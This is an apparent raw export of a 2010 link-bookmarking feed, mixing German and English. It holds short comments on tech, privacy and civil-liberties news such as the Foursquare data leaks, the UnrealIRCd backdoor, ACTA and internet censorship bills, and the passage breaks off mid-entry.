+</p>http://www.zgeek.com/content.php/3191-Comedy-Central-censors-Futurama-s-jab-at-Applepage_shots/2010/07/04/no_page_shot.pngzgeek-we-put-the-m-in-stupid-comedy-central11012010-07-04 01:13:485apple iphoneLittle Spiderman uses vacuum cleaners to climb buildings, win the hearts of the ladies -- EngadgetTyp klettert mit einem Staubsauger die Wände hoch. Spiderman<p>Typ klettert mit einem Staubsauger die Wände hoch. Spiderman +</p>http://www.engadget.com/2010/07/01/little-spiderman-uses-vacuum-cleaners-to-climb-buildings-win-th/page_shots/2010/07/02/little-spiderman-uses-vacuum-cleaners-to-climb-bui.pnglittle-spiderman-uses-vacuum-cleaners-to-climb-bui11012010-07-02 15:29:585spiderman vaccumFoursquare cared a lot more about $20M than your privacyRyan Singel at Wired News has been covering the story of reported breaches of privacy for Foursquare users, and the company's horrible (and horribly slow) response to the matter. It all started on June 20, when the startup received an unsolicited message from a white-hat hacker: it was leaking user data on a massive scale, and violating its own privacy policy.<p>Ryan Singel at Wired News has been covering the story of reported breaches of privacy for Foursquare users, and the company's horrible (and horribly slow) response to the matter. It all started on June 20, when the startup received an unsolicited message from a white-hat hacker: it was leaking user data on a massive scale, and violating its own privacy policy. +</p>http://www.wired.com/threatlevel/2010/06/foursquare-privacy-funding/page_shots/2010/07/02/foursquare-cared-a-lot-more-about-20m-than-your-p.pngfoursquare-cared-a-lot-more-about-20m-than-your-p131012010-07-02 14:50:545online, privacy, social networkletzte 2 Space Shuttle FluegeDie letzten zwei Flüge: + +Nov. 1 for space shuttle Discovery's STS-133 mission. +Feb. 26, 2011, for the liftoff of shuttle Endeavour's STS-134 mission.<p>Die letzten zwei Flüge: +</p> +<p>Nov. 1 for space shuttle Discovery's STS-133 mission. + Feb. 26, 2011, for the liftoff of shuttle Endeavour's STS-134 mission. +</p>http://www.networkworld.com/community/node/63156page_shots/2010/07/01/unknown-title001_.pngunknown-title00111012010-07-01 20:36:025nasa shuttleBkis Blog &raquo; Adobe fix still allows &#8220;Escape from PDF&#8221;Die haben es echt nicht im Griff. Nach so langer Zeit taugt der Fix nix.<p>Die haben es echt nicht im Griff. Nach so langer Zeit taugt der Fix nix. +</p>http://blog.bkis.com/en/adobe-fix-still-allows-escape-from-pdf/page_shots/2010/07/01/bkis-blog-raquo-adobe-fix-still-allows-8220es.pngbkis-blog-raquo-adobe-fix-still-allows-8220es11012010-07-01 15:08:595adobe pdfGoogle: Flash stays on YouTube, and here's why • The RegisterGoogle is pulling back from WebM - or at least cont' to have Flash as their #1. Stupid politics.<p>Google is pulling back from WebM - or at least cont' to have Flash as their #1. Stupid politics. +</p>http://www.theregister.co.uk/2010/06/30/why_youtube_still_uses_flash/page_shots/2010/07/01/google-flash-stays-on-youtube-and-heres-why-t.pnggoogle-flash-stays-on-youtube-and-heres-why-t11012010-07-01 14:55:185flash google vp8Russian spy ring bust uncovers tech toolkit • The RegisterAd-Hoc WiFi and steganography are the tools of Russian spys<p>Ad-Hoc WiFi and steganography are the tools of Russian spys +</p>http://www.theregister.co.uk/2010/06/29/spy_ring_tech/page_shots/2010/07/01/russian-spy-ring-bust-uncovers-tech-toolkit-the.pngrussian-spy-ring-bust-uncovers-tech-toolkit-the11012010-07-01 14:47:585russia spyNokia snaffles user data on the down-low • The RegisterZwangssubscription bei Nokia n900<p>Zwangssubscription bei Nokia n900 +</p>http://www.theregister.co.uk/2010/07/01/nokia_n900_update/page_shots/2010/07/01/nokia-snaffles-user-data-on-the-down-low-the-reg.pngnokia-snaffles-user-data-on-the-down-low-the-reg11012010-07-01 13:56:485n900 nokiaheise online - Geolocatoren werden zum DatenschutzproblemObwohl der Geolocation-Dienst Foursquare den Aufenthaltsort eines Anwenders nur seinen Freunden verraten sollte, ließ sich durch permanente Überwachung von Standorten mit Skripten rekonsturieren, wer sich wann wo aufhielt. Der Entwickler Jesper Andersen hatte mit einem Skript auf diese Weise im Raum San Francisco fast 900.000 sogenannte Check-ins von Personen zu Orten zuordnen können<p>Obwohl der Geolocation-Dienst Foursquare den Aufenthaltsort eines Anwenders nur seinen Freunden verraten sollte, ließ sich durch permanente Überwachung von Standorten mit Skripten rekonsturieren, wer sich wann wo aufhielt. Der Entwickler Jesper Andersen hatte mit einem Skript auf diese Weise im Raum San Francisco fast 900.000 sogenannte Check-ins von Personen zu Orten zuordnen können +</p>http://www.heise.de/newsticker/meldung/Geolocatoren-werden-zum-Datenschutzproblem-1031799.htmlpage_shots/2010/07/01/heise-online-geolocatoren-werden-zum-datenschutz.pngheise-online-geolocatoren-werden-zum-datenschutz11012010-07-01 13:52:225foursquare geoJobs at Apple: Antenna designerJetzt suchen sie Antennen-Leute...<p>Jetzt suchen sie Antennen-Leute... +</p>http://jobs.apple.com/index.ajs?BID=1&method=mExternal.showJob&RID=55852page_shots/2010/06/30/apple-jobs-at-apple-job-description_.pngapple-jobs-at-apple-job-description11012010-06-30 18:02:005antenna appleOklahoma police tase an 86-year-old bedridden grandmotherWhen Lonnie Tinsley's 86-year-old bedridden grandmother refused to take her medicine, he called emergency services in El Reno, Oklahoma and requested a medical technician. Instead, a dozen armed officers arrived at the scene. +According to officer Duran’s official report, Mrs Vernon had taken an 'aggressive posture' in her hospital bed. In order to ensure 'officer safety', one of his men 'stepped on her oxygen hose until she began to suffer oxygen deprivation'. Another of the officers then shot her with a taser, but the connection wasn’t solid. A second fired his taser, 'striking her to the left of the midline of her upper chest, and applied high voltage, causing burns to her chest, extreme pain', and unconsciousness. Lona was then handcuffed with sufficient ruthlessness to tear the soft flesh of her forearms, causing her to bleed. After her wounds were treated at a local hospital, Lona was confined for six days in the psychiatric ward at the insistence of the El Reno Police Department.<p>When Lonnie Tinsley's 86-year-old bedridden grandmother refused to take her medicine, he called emergency services in El Reno, Oklahoma and requested a medical technician. Instead, a dozen armed officers arrived at the scene. + According to officer Duran’s official report, Mrs Vernon had taken an 'aggressive posture' in her hospital bed. In order to ensure 'officer safety', one of his men 'stepped on her oxygen hose until she began to suffer oxygen deprivation'. Another of the officers then shot her with a taser, but the connection wasn’t solid. A second fired his taser, 'striking her to the left of the midline of her upper chest, and applied high voltage, causing burns to her chest, extreme pain', and unconsciousness. Lona was then handcuffed with sufficient ruthlessness to tear the soft flesh of her forearms, causing her to bleed. After her wounds were treated at a local hospital, Lona was confined for six days in the psychiatric ward at the insistence of the El Reno Police Department. +</p>http://www.dailymail.co.uk/news/worldnews/article-1289780/Dont-taze-granny-American-police-accused-using-Taser-86-year-old-bed-ridden-grandmother.htmlpage_shots/2010/06/29/oklahoma-police-tase-an-86-year-old-bedridden-gran.pngoklahoma-police-tase-an-86-year-old-bedridden-gran131012010-06-29 10:49:455abuse macht missbrauch nonlethal police taser waffeToronto's secret ID law used to arrest G20 protestorIn Canada you're not required to show ID. Except if you're in the 'G20 Zone'. You see, the law allows an exemption to the 'show ID' principle for public works. These are usually things like power stations, dams, etc. Well, the government got clever and just declared the entire area a 'public work' so police can go around demanding ID. The best part of this? The law that made this happen won't even be PUBLISHED until after the G20 is over. So nobody knew about it until the cops arrested someone.<p>In Canada you're not required to show ID. Except if you're in the 'G20 Zone'. You see, the law allows an exemption to the 'show ID' principle for public works. These are usually things like power stations, dams, etc. Well, the government got clever and just declared the entire area a 'public work' so police can go around demanding ID. The best part of this? The law that made this happen won't even be PUBLISHED until after the G20 is over. So nobody knew about it until the cops arrested someone. +</p>http://www.thestar.com/news/gta/torontog20summit/article/828372--man-arrested-and-left-in-wire-cage-under-new-g20-lawpage_shots/2010/06/26/torontos-secret-id-law-used-to-arrest-g20-protest.pngtorontos-secret-id-law-used-to-arrest-g20-protest131012010-06-26 01:41:525id, law, law enforcement, politics, terrorYoung people, risky behavior and the net: the factsdanah boyd and Samantha Biegler have released a draft literature review on "Risky Behaviors and Online Safety," commissioned by Harvard's Berkman Center for Internet & Society. It looks at the latest papers on the risks presented to young people by using the Internet; if you've been reading the newspapers, the distance between the reality and what you've heard in the sensationalist accounts of pedos, cyberbullies, etc, will surprise.<p>danah boyd and Samantha Biegler have released a draft literature review on "Risky Behaviors and Online Safety," commissioned by Harvard's Berkman Center for Internet &amp; Society. It looks at the latest papers on the risks presented to young people by using the Internet; if you've been reading the newspapers, the distance between the reality and what you've heard in the sensationalist accounts of pedos, cyberbullies, etc, will surprise. +</p>http://www.zephoria.org/thoughts/archives/2010/06/24/risky-behaviors-and-online-safety-a-2010-literature-review.htmlpage_shots/2010/06/25/young-people-risky-behavior-and-the-net-the-fact_.pngyoung-people-risky-behavior-and-the-net-the-fact131012010-06-25 16:50:325freedom internetausdrucker internetsperren media onlineRegwall cuts The Times's online readership in halfRupert Murdoch's Times newspaper has instituted a registration wall as a preliminary step toward a full-blown paywall. Readership of the online edition immediately dropped by 50%. <p>Rupert Murdoch's Times newspaper has instituted a registration wall as a preliminary step toward a full-blown paywall. Readership of the online edition immediately dropped by 50%. +</p>http://arstechnica.com/media/news/2010/06/incipient-paywall-costing-newspaper-online-readers.arspage_shots/2010/06/26/httpwwwboingboingnet20100624regwall-cuts.pnghttpwwwboingboingnet20100624regwall-cuts131012010-06-25 16:46:495copyright newspaper online payment, imaginary propertyEU secretly pushing to put kids in jail for sharing music: ACTA leak"The ACTA agreement, by its opacity and undemocratic nature, allows criminal sanctions to be simply negotiated. The leaked document shows that the EU Member States are willing to impose prison sanctions for non-commercial usages of copyrighted works on the Internet as well as for 'inciting and aiding', a notion so broad that it could cover any Internet service or speech questioning copyright policies. EU citizens should interrogate their governments about their support to policies that obviously attack freedom of speech, privacy and innovation. Around the next round of negotiations and beyond, ACTA should be restlessly combatted and opposed worldwide." concludes Jérémie Zimmermann, spokesperson for citizen advocacy group La Quadrature du Net. That means putting kids in jail for trading music with one another. <p>"The ACTA agreement, by its opacity and undemocratic nature, allows criminal sanctions to be simply negotiated. The leaked document shows that the EU Member States are willing to impose prison sanctions for non-commercial usages of copyrighted works on the Internet as well as for 'inciting and aiding', a notion so broad that it could cover any Internet service or speech questioning copyright policies. EU citizens should interrogate their governments about their support to policies that obviously attack freedom of speech, privacy and innovation. Around the next round of negotiations and beyond, ACTA should be restlessly combatted and opposed worldwide." concludes Jérémie Zimmermann, spokesperson for citizen advocacy group La Quadrature du Net. That means putting kids in jail for trading music with one another. +</p>http://www.laquadrature.net/en/leak-eu-pushes-for-criminalizing-non-commercial-usages-in-actapage_shots/2010/06/26/eu-secretly-pushing-to-put-kids-in-jail-for-sharin.pngeu-secretly-pushing-to-put-kids-in-jail-for-sharin131012010-06-25 16:44:555acta, eu, file sharing, free speech, imaginary propertyFrankreich: Bewährungsstrafe für Twitter-Hacker | tagesschau.deEin Franzose, der die Twitter-Konten von US-Präsident Barack Obama und der Sängerin Britney Spears geknackt hat, muss nicht ins Gefängnis. Ein Gericht in Clermont-Ferrand verurteilte den "Hacker-Croll" genannten Mann zu fünf Monaten Haft auf Bewährung. + +Im Prozess hatte der Arbeitslose bestritten, ein Hacker zu sein. Er habe nie ein Konto verändert oder sonst etwas Böses getan, sagte er. Er habe Sicherheitslücken beim Kurzmitteilungsdienst Twitter aufgedeckt. + +# Passwort von Twitter-Mitarbeiter geknackt + +Die vom FBI alarmierten französischen Fahnder waren "Hacker-Croll" schnell auf die Schliche gekommen. Um die Twitter-Konten zu knacken, hatte der Mann via Internet private Informationen über Twitter-Mitarbeiter gesammelt und daraus auf ihre E-Mail-Passwörter geschlossen. Bei einem hatte er Erfolg und konnte sich auf dessen Seite einloggen. In den Mails des Mannes fand er dann Hinweise darauf, wie er sich als Administrator-Zugang zu Twitter-Nutzerkonten verschaffen konnte.<p>Ein Franzose, der die Twitter-Konten von US-Präsident Barack Obama und der Sängerin Britney Spears geknackt hat, muss nicht ins Gefängnis. Ein Gericht in Clermont-Ferrand verurteilte den "Hacker-Croll" genannten Mann zu fünf Monaten Haft auf Bewährung. +</p> +<p>Im Prozess hatte der Arbeitslose bestritten, ein Hacker zu sein. Er habe nie ein Konto verändert oder sonst etwas Böses getan, sagte er. Er habe Sicherheitslücken beim Kurzmitteilungsdienst Twitter aufgedeckt. +</p> + +<h1>Passwort von Twitter-Mitarbeiter geknackt</h1> +<p>Die vom FBI alarmierten französischen Fahnder waren "Hacker-Croll" schnell auf die Schliche gekommen. Um die Twitter-Konten zu knacken, hatte der Mann via Internet private Informationen über Twitter-Mitarbeiter gesammelt und daraus auf ihre E-Mail-Passwörter geschlossen. Bei einem hatte er Erfolg und konnte sich auf dessen Seite einloggen. In den Mails des Mannes fand er dann Hinweise darauf, wie er sich als Administrator-Zugang zu Twitter-Nutzerkonten verschaffen konnte. +</p>http://www.tagesschau.de/ausland/twitterurteil100.htmlpage_shots/2010/06/24/frankreich-bewahrungsstrafe-fur-twitter-hacker.pngfrankreich-bewahrungsstrafe-fur-twitter-hacker11012010-06-24 23:45:065hack twitterDoes Uncle Sam really need 1,100 data centers?US gov has 1.100 data centers<p>US gov has 1.100 data centers +</p>http://arstechnica.com/business/news/2010/06/uncle-sam-looks-to-data-center-consolidation-for-savings.arspage_shots/2010/06/24/does-uncle-sam-really-need-1100-data-centers.pngdoes-uncle-sam-really-need-1100-data-centers11012010-06-24 17:00:035usTechnology firms 'more trusted than traditional media' - TelegraphAccording to a study by market research company Zogby International, people trust Google, Apple, and Microsoft more than the traditional media. Social networking sites such as Facebook and Twitter scored lowest on the trust scale, but still soundly beat the media. From the article: "The traditional media received little sympathy from the public, with only eight percent of all adults and six percent of young adults saying they trusted them."<p>According to a study by market research company Zogby International, people trust Google, Apple, and Microsoft more than the traditional media. Social networking sites such as Facebook and Twitter scored lowest on the trust scale, but still soundly beat the media. From the article: "The traditional media received little sympathy from the public, with only eight percent of all adults and six percent of young adults saying they trusted them." +</p>http://www.telegraph.co.uk/technology/news/7847882/Technology-firms-more-trusted-than-traditional-media.htmlpage_shots/2010/06/24/technology-firms-more-trusted-than-traditional-me_.pngtechnology-firms-more-trusted-than-traditional-me11012010-06-24 12:17:315trustViacom vs. Internet: round one to InternetThe lawsuit has been a circus. Filings in the case reveal that Viacom paid dozens of marketing companies to clandestinely upload its videos to YouTube (sometimes "roughing them up" to make them look like pirate-chic leaks). Viacom uploaded so much of its content to YouTube that it actually lost track of which videos were "really" pirated, and which ones it had put there, and sent legal threats to Google over videos it had placed itself.<p>The lawsuit has been a circus. Filings in the case reveal that Viacom paid dozens of marketing companies to clandestinely upload its videos to YouTube (sometimes "roughing them up" to make them look like pirate-chic leaks). Viacom uploaded so much of its content to YouTube that it actually lost track of which videos were "really" pirated, and which ones it had put there, and sent legal threats to Google over videos it had placed itself. +</p>http://news.yahoo.com/s/ap/20100623/ap_on_hi_te/us_tec_google_youtube_viacompage_shots/2010/06/24/viacom-vs-internet-round-one-to-internet_.pngviacom-vs-internet-round-one-to-internet131012010-06-24 12:12:585file sharing, google, imaginary property, piracy, viacom, youtubeAustralian Government To Force Internet Users To Install State-Approved Software | NewWORLDLibertyThe Australian government is set to intensify its war against Internet freedom by forcing web users to install state-approved anti-virus software. If they fail to do so, they will be denied an Internet connection, or if their computer is later infected, the user’s connection will be terminated.<p>The Australian government is set to intensify its war against Internet freedom by forcing web users to install state-approved anti-virus software. If they fail to do so, they will be denied an Internet connection, or if their computer is later infected, the user’s connection will be terminated. +</p>http://www.newworldliberty.com/newsarticle/australian-government-force-internet-users-install-state-approved-softwarepage_shots/2010/06/22/australian-government-to-force-internet-users-to-i.pngaustralian-government-to-force-internet-users-to-i11012010-06-22 15:49:414australia censorshipheise online - Bürgerrechtler wollen gegen Volkszählung 2011 klagenUnbedingt publik machen! Auf [zensus11.de](http://zensus11.de/) hinweisen.<p>Unbedingt publik machen! Auf <a href="http://zensus11.de/">zensus11.de</a> hinweisen. +</p>http://www.heise.de/newsticker/meldung/Buergerrechtler-wollen-gegen-Volkszaehlung-2011-klagen-1026704.htmlpage_shots/2010/06/22/heise-online-burgerrechtler-wollen-gegen-volksza.pngheise-online-burgerrechtler-wollen-gegen-volksza11012010-06-22 11:48:464zensusheise online - &quot;Das Glück, dass meiner zuerst lief&quot; – Zum 100. Geburtstag von Konrad ZuseDer Vollständigkeit halber: Vor 100 Jahren wurde Konrad Zuse geboren, der den ersten Computer der Welt gebaut hat (12. Mai 1941).<p>Der Vollständigkeit halber: Vor 100 Jahren wurde Konrad Zuse geboren, der den ersten Computer der Welt gebaut hat (12. Mai 1941). +</p>http://www.heise.de/newsticker/meldung/Das-Glueck-dass-meiner-zuerst-lief-Zum-100-Geburtstag-von-Konrad-Zuse-1026082.htmlpage_shots/2010/06/22/heise-online-quotdas-gluck-dass-meiner-zuerst_.pngheise-online-quotdas-gluck-dass-meiner-zuerst11012010-06-22 11:05:424computer zuseTwitter on a ZX Spectrum • The RegisterWird wohl kaum einer verstehen, aber echt eine [Leistung](http://www.youtube.com/watch?v=-ECnN7jdgA4 "YouTube")<p>Wird wohl kaum einer verstehen, aber echt eine <a href="http://www.youtube.com/watch?v=-ECnN7jdgA4" title="YouTube">Leistung</a> +</p>http://www.theregister.co.uk/2010/06/21/vintage_computer_fair/page_shots/2010/06/21/twitter-on-a-zx-spectrum-the-register.pngtwitter-on-a-zx-spectrum-the-register11012010-06-21 23:00:494twitter zx_spectrumTechnik-Streit - iPad-Nutzung im Bundestag sorgt für Ärger - Politik - Berliner MorgenpostOnly in .de: FDP-Redner im Bundestag liest sein Geplapper vom iPad ab und das ist aber wie alle Computer im Bundestag verboten. Was machen die denn da mit Smartphones?<p>Only in .de: FDP-Redner im Bundestag liest sein Geplapper vom iPad ab und das ist aber wie alle Computer im Bundestag verboten. Was machen die denn da mit Smartphones? +</p>http://www.morgenpost.de/politik/article1329805/iPad-Nutzung-im-Bundestag-sorgt-fuer-Aerger.htmlpage_shots/2010/06/21/technik-streit-ipad-nutzung-im-bundestag-sorgt-f.pngtechnik-streit-ipad-nutzung-im-bundestag-sorgt-f11012010-06-21 22:47:204bundestag ipadAmazon has officially patented the "Social Networking System"As incredible as it sounds, the United States Patent and Trademark Office actually awarded Amazon a patent for the "Social Networking System." To make it truly ridiculous, the abstract on the patent reads as though it were succinctly describing Facebook. + +Take a look for yourself; here's the abstract from the top of the patent. + +> A networked computer system provides various services for assisting users in locating, and establishing contact relationships with, other users. For example, in one embodiment, users can identify other users based on their affiliations with particular schools or other organizations. The system also provides a mechanism for a user to selectively establish contact relationships or connections with other users, and to grant permissions for such other users to view ersonal information of the user. The system may also include features for enabling users to identify contacts of their respective contacts. In addition, the system may automatically notify users of personal information updates made by their respective contacts.<p>As incredible as it sounds, the United States Patent and Trademark Office actually awarded Amazon a patent for the "Social Networking System." To make it truly ridiculous, the abstract on the patent reads as though it were succinctly describing Facebook. +</p> +<p>Take a look for yourself; here's the abstract from the top of the patent. +</p> +<blockquote><p>A networked computer system provides various services for assisting users in locating, and establishing contact relationships with, other users. For example, in one embodiment, users can identify other users based on their affiliations with particular schools or other organizations. The system also provides a mechanism for a user to selectively establish contact relationships or connections with other users, and to grant permissions for such other users to view ersonal information of the user. The system may also include features for enabling users to identify contacts of their respective contacts. In addition, the system may automatically notify users of personal information updates made by their respective contacts. +</p> +</blockquote>http://www.downloadsquad.com/2010/06/17/amazon-patents-social-networking-system/page_shots/2010/06/21/amazon-has-officially-patented-the-social-network.pngamazon-has-officially-patented-the-social-network11012010-06-21 10:28:114amazon facebook patentSchadcode bei ilse-aigner.de? - Qbi's WeblogOMFG! Unsere Verbraucherschutzministerin verteilt Malware... Das ist die Tante, die jetzt bei facebook ausgetreten ist und immer Google flamed.<p>OMFG! Unsere Verbraucherschutzministerin verteilt Malware... Das ist die Tante, die jetzt bei facebook ausgetreten ist und immer Google flamed. +</p>http://www.kubieziel.de/blog/archives/1370-Schadcode-bei-ilse-aigner.de.htmlpage_shots/2010/06/18/no_page_shot.pngschadcode-bei-ilse-aignerde-qbis-weblog11012010-06-18 22:36:424aignerNew Bill Would Let Obama Police Internet for National Security Reasons - The Daily Beast A new bill rocketing through Congress would give the president sweeping powers to police the Web for national-security reasons. Could this be a way to block WikiLeaks?<p>A new bill rocketing through Congress would give the president sweeping powers to police the Web for national-security reasons. Could this be a way to block WikiLeaks? +</p>http://www.thedailybeast.com/blogs-and-stories/2010-06-18/new-bill-would-let-obama-police-internet-for-national-security-reasons/page_shots/2010/06/18/new-bill-would-let-obama-police-internet-for-natio.pngnew-bill-would-let-obama-police-internet-for-natio11012010-06-18 16:16:164censorshipMS betreibt Babyklappe für DatenDa kann man gefundene Daten abgeben.<p>Da kann man gefundene Daten abgeben. +</p>http://www.heise.de/newsticker/meldung/Microsoft-kuendigt-Meldestelle-fuer-gestohlene-Zugangsdaten-an-1025150.htmlpage_shots/2010/06/18/ms-betreibt-babyklappe-fur-daten.pngms-betreibt-babyklappe-fur-daten11012010-06-18 13:08:474dataloss fraud microsoftHTTPS Everywhere: Firefox plugin that switches on crypto whenever it's availableThe Electronic Frontier Foundation and The Onion Router (TOR) project have teamed up to release a new privacy-enhancing Firefox plugin called HTTPS Everywhere. It was inspired by Google's new encrypted search engine, and it ensures that whenever you visit a site that accepts encrypted connections, your browser switches into encrypted mode, hiding your traffic from snoops on your local network and at your ISP. HTTPS Everywhere covers Google search, Wikipedia, Twitter, Identi.ca, Facebook, EFF, Tor, Scroogle, DuckDuckGo, Ixquick and other smaller search engines. It's still in beta (what isn't?) but I've been running it all morning with no negative side effects. <p>The Electronic Frontier Foundation and The Onion Router (TOR) project have teamed up to release a new privacy-enhancing Firefox plugin called HTTPS Everywhere. It was inspired by Google's new encrypted search engine, and it ensures that whenever you visit a site that accepts encrypted connections, your browser switches into encrypted mode, hiding your traffic from snoops on your local network and at your ISP. HTTPS Everywhere covers Google search, Wikipedia, Twitter, Identi.ca, Facebook, EFF, Tor, Scroogle, DuckDuckGo, Ixquick and other smaller search engines. It's still in beta (what isn't?) but I've been running it all morning with no negative side effects. +</p>https://www.eff.org/deeplinks/2010/06/encrypt-web-https-everywhere-firefox-extensionpage_shots/2010/06/18/https-everywhere-firefox-plugin-that-switches-on.pnghttps-everywhere-firefox-plugin-that-switches-on131012010-06-18 13:01:074crypto eff firefox openssl plugin tor Verleger: Leistungsschutzrecht soll Sprache monopolisieren : netzpolitik.orgDie sterbenden Zeitungsverleger versuchen nun die Sprache zu "patentieren". + +Um einen effektiven Rechtsschutz zu gewährleisten, sollten nicht nur Teile des Presseerzeugnisses wie einzelne Beiträge, Vorspänne, Bilder und Grafiken geschützt werden. Schutzwürdig sind beispielsweise auch Überschriften, Sätze, Satzteile etc., soweit sie einer systematischen Vervielfältigung, Verbreitung oder öffentlichen Wiedergabe in Verbindung mit dem Titel des Presseerzeugnisses dienen. + +*Tolle Wurst*<p>Die sterbenden Zeitungsverleger versuchen nun die Sprache zu "patentieren". +</p> +<p>Um einen effektiven Rechtsschutz zu gewährleisten, sollten nicht nur Teile des Presseerzeugnisses wie einzelne Beiträge, Vorspänne, Bilder und Grafiken geschützt werden. Schutzwürdig sind beispielsweise auch Überschriften, Sätze, Satzteile etc., soweit sie einer systematischen Vervielfältigung, Verbreitung oder öffentlichen Wiedergabe in Verbindung mit dem Titel des Presseerzeugnisses dienen. +</p> +<p><em>Tolle Wurst</em> +</p>http://www.netzpolitik.org/2010/verleger-leistungsschutzrecht-soll-sprache-monopolisieren/page_shots/2010/06/18/verleger-leistungsschutzrecht-soll-sprache-mono.pngverleger-leistungsschutzrecht-soll-sprache-mono11012010-06-18 11:18:184leistungsschutzrecht patent verlegerPrinter für InternetausdruckerPrints scheduled content from the Web. Unsere Regierung ist gerettet. Jetzt auch mit Werbung!<p>Prints scheduled content from the Web. Unsere Regierung ist gerettet. Jetzt auch mit Werbung! +</p>http://www.computerworld.com/s/article/9178128/HP_partners_with_Yahoo_for_targeted_adspage_shots/2010/06/17/unknown-title_.pngunknown-title11012010-06-17 10:33:104ads hp internetausdrucker printBBC News - Armed police at Merseyside school after FBI warningHow to DOS a shool? Put up a facebook page w/ a pic of a gun and drop the letters: *tomorrow - last day of school*. The FBI takes care of the rest<p>How to DOS a shool? Put up a facebook page w/ a pic of a gun and drop the letters: <em>tomorrow - last day of school</em>. The FBI takes care of the rest +</p>http://news.bbc.co.uk/2/hi/uk_news/england/merseyside/10319053.stmpage_shots/2010/06/16/bbc-news-armed-police-at-merseyside-school-after.pngbbc-news-armed-police-at-merseyside-school-after11012010-06-16 10:19:514facebook fbiGoogle to Commies: We’ll make censorship illegal • The RegisterGoogle is working with the US government to try to make it illegal for countries to censor the Internet by using international trade rules.<p>Google is working with the US government to try to make it illegal for countries to censor the Internet by using international trade rules. +</p>http://www.theregister.co.uk/2010/06/14/googleon_vietnam/page_shots/2010/06/15/google-to-commies-well-make-censorship-illegal.pnggoogle-to-commies-well-make-censorship-illegal11012010-06-15 23:28:324censorship googleFederal Bureau of Investigation &ndash; Featured Fugitives - Cyber CrimesDead or alive.<p>Dead or alive. +</p>http://www.fbi.gov/wanted/fugitives/cyber/fug_cyber.htmpage_shots/2010/06/15/federal-bureau-of-investigation-ndash-featured-f.pngfederal-bureau-of-investigation-ndash-featured-f11012010-06-15 23:27:444crimeNmap Development: Always practice safe software: a lesson from UnrealIRCdDie UnrealIRCd Backdoor wäre mit signierten Paketen vermeidbar gewesen. + +The UnrealIRCd team just made an interesting vulnerability announcement: + +http://seclists.org/fulldisclosure/2010/Jun/277 + +It seems that the Unreal has been trojaned since last November on at +least some of its official mirror sites. The backdoor is very simple +and allows anyone to run arbitrary system commands pre-auth. I've +already seen one group hit by this. + +Interestingly, the Unreal team had apparently stopped GPG/PGP signing +releases because they didn't think it was worth the trouble given how +few people were verifying the signatures. Oops! They are now +planning to re-implement that feature.<p>Die UnrealIRCd Backdoor wäre mit signierten Paketen vermeidbar gewesen. +</p> +<p>The UnrealIRCd team just made an interesting vulnerability announcement: +</p> +<p>http://seclists.org/fulldisclosure/2010/Jun/277 +</p> +<p>It seems that the Unreal has been trojaned since last November on at + least some of its official mirror sites. The backdoor is very simple + and allows anyone to run arbitrary system commands pre-auth. I've + already seen one group hit by this. +</p> +<p>Interestingly, the Unreal team had apparently stopped GPG/PGP signing + releases because they didn't think it was worth the trouble given how + few people were verifying the signatures. Oops! They are now + planning to re-implement that feature. +</p>http://seclists.org/nmap-dev/2010/q2/826page_shots/2010/06/13/nmap-development-always-practice-safe-software-a.pngnmap-development-always-practice-safe-software-a11012010-06-13 18:57:074backdoor signingUS-Gesetzesinitiative: Obamas Notfall-Ausschalter fürs Internet - SPIEGEL ONLINE - Nachrichten - NetzweltBereits zum dritten Mal in dieser Legislaturperiode liegt dem US-Senat mit dem " Protecting Cyberspace as a National Asset Act" (PCNAA) ein Gesetzentwurf vor, der Barack Obama - und den US-Sicherheitsbehörden - weitreichende Kontrolle über Amerikas Netz- und Telekommunikationsinfrastruktur geben soll. +Dem Präsidenten wird darin die Möglichkeit gegeben, eine Art Cyber-Notstand zu erklären. + +* Netzwerk-TÜV +* Privatunternehmen sollen an staatl. IDS teilnehmen.<p>Bereits zum dritten Mal in dieser Legislaturperiode liegt dem US-Senat mit dem " Protecting Cyberspace as a National Asset Act" (PCNAA) ein Gesetzentwurf vor, der Barack Obama - und den US-Sicherheitsbehörden - weitreichende Kontrolle über Amerikas Netz- und Telekommunikationsinfrastruktur geben soll. + Dem Präsidenten wird darin die Möglichkeit gegeben, eine Art Cyber-Notstand zu erklären. +</p> +<ul> + <li> + Netzwerk-TÜV + </li> + + <li> + Privatunternehmen sollen an staatl. IDS teilnehmen. + </li> +</ul>http://www.spiegel.de/netzwelt/netzpolitik/0,1518,700136,00.htmlpage_shots/2010/06/12/us-gesetzesinitiative-obamas-notfall-ausschalter.pngus-gesetzesinitiative-obamas-notfall-ausschalter11012010-06-12 22:14:474pcnaaMinisterpräsidenten unterzeichnen den Jugendmedienschutz-StaatsvertragDie Ministerpräsidenten der Länder haben gestern ihre Unterschrift unter den neuen Jugendmedienschutz-Staatsvertrag (JMStV) gesetzt, mit dem eine Altersbeschränkung für Webseiten eingeführt werden soll. Bürgerrechtler bezweifeln die Freiwilligkeit der Kontrolle und warnen vor dem Einstieg in die (Selbst-) Zensur.<p>Die Ministerpräsidenten der Länder haben gestern ihre Unterschrift unter den neuen Jugendmedienschutz-Staatsvertrag (JMStV) gesetzt, mit dem eine Altersbeschränkung für Webseiten eingeführt werden soll. Bürgerrechtler bezweifeln die Freiwilligkeit der Kontrolle und warnen vor dem Einstieg in die (Selbst-) Zensur. +</p>http://www.spreeblick.com/2010/06/11/ministerprasidenten-unterzeichnen-den-jugendmedienschutz-staatvertrag/#more-32714page_shots/2010/06/12/ministerprasidenten-unterzeichnen-den-jugendmedien.pngministerprasidenten-unterzeichnen-den-jugendmedien131012010-06-12 18:51:114censorship deutschland dpi germany jmstv zensurWireless signals to be jammed in Canada for G8 summit • The RegisterG8 Gipfel mit jammed air. Warum machen die das G8 Treffen nicht auf dem Mond?<p>G8 Gipfel mit jammed air. Warum machen die das G8 Treffen nicht auf dem Mond? +</p>http://www.theregister.co.uk/2010/06/11/wireless_jamming_canada/page_shots/2010/06/12/wireless-signals-to-be-jammed-in-canada-for-g8-sum.pngwireless-signals-to-be-jammed-in-canada-for-g8-sum11012010-06-12 18:34:454g8 jammerOpenSSL-Updates beseitigen SchwachstellenDie OpenSSL-Entwickler haben die Versionen 0.9.8o und 1.0.0a vorgelegt, in denen sie nur sicherheitsrelevante Probleme gelöst haben. So lässt sich ein Fehler im ASN.1-Parser ausnutzen, um mit präparierten Strukturen einer "Cryptographic Message Syntax"-Nachricht (CMS) in nicht erlaubte Speicherbereiche zu schreiben. Möglicherweise lässt sich der Fehler ausnutzen, um Code in ein System zu schleusen und ein System zu kompromittieren. In dem OpenSSL-Zweig 0.9.8 ist CMS standardmäßig nicht aktiviert, im Zweig 1.0.0 ist es jedoch 